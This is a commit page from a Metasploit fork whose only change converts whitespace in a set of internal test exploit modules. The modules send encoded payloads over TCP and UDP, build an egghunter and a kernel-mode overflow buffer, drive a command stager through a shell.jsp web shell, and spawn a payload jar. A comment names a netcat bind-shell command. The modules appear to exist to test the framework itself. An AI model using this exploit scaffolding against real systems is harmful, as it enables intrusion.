adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Retab all the things (except external/)

Browse Source
This commit is contained in:
Tab Assassin
2013-09-30 13:47:53 -05:00
parent 0ecba377f5
commit 2e8d19edcf
293 changed files with 32962 additions and 32962 deletions
Download Patch File Download Diff File Expand all files Collapse all files
test/modules/exploits/test/aggressive.rb
+89 -89
View File
@@ -12,106 +12,106 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Aggressive Test Exploit',
'Description' =>
"This module tests the exploitation of a test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Any Platform',
{
'Platform' => [ 'linux', 'win' ]
}
],
[
'Test encoder specific',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'EBX',
'BufferOffset' => 4
}
}
},
],
[
'Cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
],
[ 'Test context encoder',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => "\x00"
}
}
]
],
'DefaultTarget' => 0))
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Aggressive Test Exploit',
'Description' =>
"This module tests the exploitation of a test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Any Platform',
{
'Platform' => [ 'linux', 'win' ]
}
],
[
'Test encoder specific',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'EBX',
'BufferOffset' => 4
}
}
},
],
[
'Cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
],
[ 'Test context encoder',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => "\x00"
}
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
end
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
sock.put(payload.encoded)
sock.put(payload.encoded)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
test/modules/exploits/test/check.rb
+29 -29
View File
@@ -9,37 +9,37 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 23 2013'
))
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 23 2013'
))
register_options(
[
Opt::RPORT(80)
], self.class)
end
register_options(
[
Opt::RPORT(80)
], self.class)
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def exploit
print_debug "Exploit is successful."
end
def exploit
print_debug "Exploit is successful."
end
end
test/modules/exploits/test/cmdweb.rb
+59 -59
View File
@@ -12,75 +12,75 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def autofilter
false
end
def autofilter
false
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
def exploit
def exploit
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
execute_cmdstager(opts)
execute_cmdstager(opts)
handler
handler
end
end
end
test/modules/exploits/test/dialup.rb
+37 -37
View File
@@ -12,46 +12,46 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Dialup
include Msf::Exploit::Remote::Dialup
def initialize(info = {})
super(update_info(info,
'Name' => 'Test Dialup Exploit',
'Description' => %q{
This exploit connects to a system's modem over dialup and provides
the user with a readout of the login banner.
},
'Version' => '$Revision$',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Test Dialup Exploit',
'Description' => %q{
This exploit connects to a system's modem over dialup and provides
the user with a readout of the login banner.
},
'Version' => '$Revision$',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def autofilter
false
end
def exploit
connect_dialup
handler
disconnect_dialup
end
def exploit
connect_dialup
handler
disconnect_dialup
end
end
test/modules/exploits/test/egghunter.rb
+66 -66
View File
@@ -12,87 +12,87 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
def exploit
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
sploit = ''
sploit = ''
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
sock.put(sploit)
sock.put(sploit)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
test/modules/exploits/test/exploitme.rb
+104 -104
View File
@@ -12,123 +12,123 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MIPS Aggressive Test Exploit',
'Description' => 'This module tests the exploitation of a test service',
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
#'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'MaxNops' => 0,
#'BadChars' => "\x00",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Mips big endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE
}
],
[
'Mips big endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips big endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
[
'Mips little endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE
}
],
[
'Mips little endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips little endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
def initialize(info = {})
super(update_info(info,
'Name' => 'MIPS Aggressive Test Exploit',
'Description' => 'This module tests the exploitation of a test service',
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
#'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'MaxNops' => 0,
#'BadChars' => "\x00",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Mips big endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE
}
],
[
'Mips big endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips big endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
[
'Mips little endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE
}
],
[
'Mips little endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips little endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
],
'DefaultTarget' => 0))
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
sock.put(payload.encoded)
sock.put(payload.encoded)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
test/modules/exploits/test/java_tester.rb
+35 -35
View File
@@ -13,46 +13,46 @@ require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
def initialize( info = {} )
super( update_info( info,
'Name' => 'Exec',
'Description' => %q{ },
'License' => MSF_LICENSE,
'Author' => [ 'egypt' ],
'Version' => '$Revision$',
'References' => [ ],
'Platform' => [ 'java', 'linux' ],
'Arch' => ARCH_JAVA,
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
[ 'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
} ],
],
'DefaultTarget' => 0
))
def initialize( info = {} )
super( update_info( info,
'Name' => 'Exec',
'Description' => %q{ },
'License' => MSF_LICENSE,
'Author' => [ 'egypt' ],
'Version' => '$Revision$',
'References' => [ ],
'Platform' => [ 'java', 'linux' ],
'Arch' => ARCH_JAVA,
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
[ 'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
} ],
],
'DefaultTarget' => 0
))
end
end
def exploit
# Equivalent to payload.encoded
@jar_data = payload.encoded_jar.pack
def exploit
# Equivalent to payload.encoded
@jar_data = payload.encoded_jar.pack
File.open("payload.jar", "wb") do |fd|
fd.write(@jar_data)
end
File.open("payload.jar", "wb") do |fd|
fd.write(@jar_data)
end
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
end
test/modules/exploits/test/kernel.rb
+59 -59
View File
@@ -15,74 +15,74 @@ require 'msf/core'
# This is a test exploit for testing kernel-mode payloads.
#
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
connect_udp
def exploit
connect_udp
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
udp_sock.put(buf)
udp_sock.put(buf)
select(nil,nil,nil,2)
select(nil,nil,nil,2)
disconnect_udp
end
disconnect_udp
end
end
test/modules/exploits/test/shell.rb
+37 -37
View File
@@ -12,49 +12,49 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Test',
'Description' => %q{
This module tests cmd payloads by targeting (for example) a server
like: nc -l -p 31337 -e /bin/sh
},
'Author' => 'egypt',
'Version' => '$Revision$',
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Test',
'Description' => %q{
This module tests cmd payloads by targeting (for example) a server
like: nc -l -p 31337 -e /bin/sh
},
'Author' => 'egypt',
'Version' => '$Revision$',
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(31337),
], self.class)
end
register_options(
[
Opt::RPORT(31337),
], self.class)
end
def autofilter
false
end
def autofilter
false
end
def exploit
connect
def exploit
connect
sock.put(payload.encoded + "\n")
sock.put(payload.encoded + "\n")
handler
end
handler
end
end